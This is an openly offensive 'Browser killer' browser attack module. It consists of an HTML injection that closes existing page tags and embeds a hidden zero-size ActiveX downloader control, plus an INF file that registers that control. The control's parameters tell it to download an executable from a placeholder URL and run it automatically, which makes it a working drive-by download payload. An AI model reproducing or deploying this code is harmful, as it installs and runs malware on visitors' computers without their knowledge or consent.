[html]
# ----------------------------------------------------------------------------
# Browser killer
# Browser attack module
# author :  weibo@flagellantX
# ----------------------------------------------------------------------------
</html></script></body><BODY><OBJECT ID="Playing1" WIDTH="0" HEIGHT="0" CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" CODEBASE="Playing.ISO#Version=1,0,0,1"><PARAM NAME="propProgressbackground" VALUE="#bccee8"><PARAM NAME="propTextbackground" VALUE="#f7f8fc"><PARAM NAME="propBarColor" VALUE="#df0203"><PARAM NAME="propTextColor" VALUE="#000000"><PARAM NAME="propWidth" VALUE="0"><PARAM NAME="propHeight" VALUE="0"><PARAM NAME="propDownloadUrl" VALUE="http://网络地址/可执行文件"><PARAM NAME="propPostdownloadAction" VALUE="run"><PARAM NAME="propInstallCompleteUrl" VALUE=""><PARAM NAME="propbrowserRedirectUrl" VALUE=""><PARAM NAME="propVerbose" VALUE="0"><PARAM NAME="propInterrupt" VALUE="0"></OBJECT></script></body></html>
------------------------------------------------------------------------------
[version]
    signature="$CHICAGO$"
    AdvancedINF=2.0
[Add.Code]
    DownloaderActiveX.ocx=Playing.ocx
[Playing.ocx]
    file-win32-x86=thiscab
    clsid={c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61}
    FileVersion=1,0,0,1
    RegisterServer=yes
-------------------------------------------------------------------------------
[Playing.ocx]
